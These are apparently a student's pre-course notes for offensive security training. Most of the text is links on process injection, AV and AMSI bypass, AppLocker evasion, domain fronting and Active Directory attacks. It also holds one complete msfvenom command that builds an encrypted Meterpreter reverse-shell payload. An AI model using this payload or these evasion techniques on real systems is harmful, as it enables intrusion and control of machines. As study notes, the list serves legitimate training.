Just a place to store some of my pre-course research notes.
https://rastamouse.me/blog/process-injection-dinvoke/
https://en.wikipedia.org/wiki/Windows_Registry
https://www.lifewire.com/windows-registry-2625992
https://buffered.io/posts/staged-vs-stageless-handlers/
https://en.wikipedia.org/wiki/Dropper_(malware)
https://rastamouse.me/blog/asb-bypass-pt2/
https://outflank.nl/blog/2018/08/14/html-smuggling-explained/
https://github.com/Arno0x/EmbedInHTML
https://digitalguardian.com/blog/what-macro-malware
https://stackoverflow.com/questions/51296291/auto-open-sub-vba/51296480
https://github.com/L4bF0x/PhishingPretexts
https://www.aeternus.sg/how-to-use-windows-api-in-vba/
https://renenyffenegger.ch/notes/development/languages/VBA/Win-API/index
https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/
https://github.com/infosecn1nja/MaliciousMacroMSBuild
https://devblogs.microsoft.com/scripting/use-powershell-to-interact-with-the-windows-api-part-1/
https://www.raydbg.com/2017/Call-Native-Win32-API-in-PowerShell/
https://powersploit.readthedocs.io/en/latest/CodeExecution/Invoke-ReflectivePEInjection/
https://stackoverflow.com/questions/63593930/how-to-call-a-win32-api-function-from-powershell
https://isc.sans.edu/forums/diary/Fileless+Malicious+PowerShell+Sample/23081/
https://www.powershellgallery.com/packages/poke/1.0.0.2/Content/delegate.ps1
http://woshub.com/using-powershell-behind-a-proxy/
https://stackoverflow.com/questions/14263359/access-web-using-powershell-and-proxy
https://cloudrun.co.uk/powershell/configuring-powershell-to-work-behind-a-proxy-server/
https://medium.com/river-yang/powershell-working-behind-a-proxy-with-authentication-eb68a337f222
https://docs.microsoft.com/en-us/previous-versions/windows/desktop/indexsrv/running-a-jscript-query
https://github.com/hlldz/SpookFlare
https://github.com/tyranid/DotNetToJScript
https://github.com/med0x2e/GadgetToJScript
https://github.com/mdsecactivebreach/SharpShooter
https://github.com/3xpl01tc0d3r/ProcessInjection
https://github.com/secrary/InjectProc
https://rastamouse.me/blog/process-injection-dinvoke/
https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing
https://medium.com/bug-bounty-hunting/dll-injection-attacks-in-a-nutshell-71bc84ac59bd
http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html
https://github.com/fdiskyou/injectAllTheThings
https://github.com/stephenfewer/ReflectiveDLLInjection
https://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/
https://gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
https://github.com/caesartcs/ProcessHollowing
https://github.com/m0n0ph1/Process-Hollowing
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.112 LPORT=9999 -f csharp --encrypt aes256 --encrypt-key 12345678901234567890123456789012 --encrypt-iv 1234567890123456
(For aes256 the --encrypt-key must be exactly 32 bytes and the --encrypt-iv exactly 16 bytes.)
$ msfvenom --list encrypt
Framework Encryption Formats [--encrypt <value>]
================================================
Name
----
aes256
base64
rc4
xor
https://sevrosecurity.com/2019/05/25/bypass-windows-defender-with-a-simple-shell-loader/
https://github.com/cribdragg3r/Simple-Loader
https://rastamouse.me/blog/asb-bypass-pt2/
https://rastamouse.me/blog/asb-bypass-pt3/
https://rastamouse.me/blog/asb-bypass-pt4/
https://github.com/api0cradle/UltimateAppLockerByPassList
https://github.com/0xVIC/myAPPLockerBypassSummary
https://digi.ninja/blog/domain_fronting.php
https://attack.mitre.org/techniques/T1090/004/
https://medium.com/@malcomvetter/simplifying-domain-fronting-8d23dcb694a0
https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling
https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
https://www.boiteaklou.fr/Abusing-Shared-Libraries.html
https://sumit-ghosh.com/articles/hijacking-library-functions-code-injection-ld-preload/
https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/
https://sra.io/blog/sitekiosk-breakout/
https://www.engetsu-consulting.com/blog/kiosk-breakout-windows
https://rastamouse.me/blog/laps-pt1/
https://rastamouse.me/blog/laps-pt2/
https://github.com/kfosaaen/Get-LAPSPasswords
https://blog.netspi.com/running-laps-around-cleartext-passwords/
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/
https://www.mssqltips.com/sqlservertip/4181/inventory-sql-logins-on-a-sql-server-with-powershell/
https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e
https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/
https://hackingandsecurity.blogspot.com/2017/07/10-places-to-stick-your-unc-path.html
https://github.com/BloodHoundAD/BloodHound
https://github.com/BloodHoundAD/SharpHound
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/AzureHound.ps1
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
https://github.com/fox-it/BloodHound.py
https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
https://www.qomplx.com/qomplx-knowledge-kerberos-delegation-attacks-explained/
https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
https://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/
https://adsecurity.org/?p=1588
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet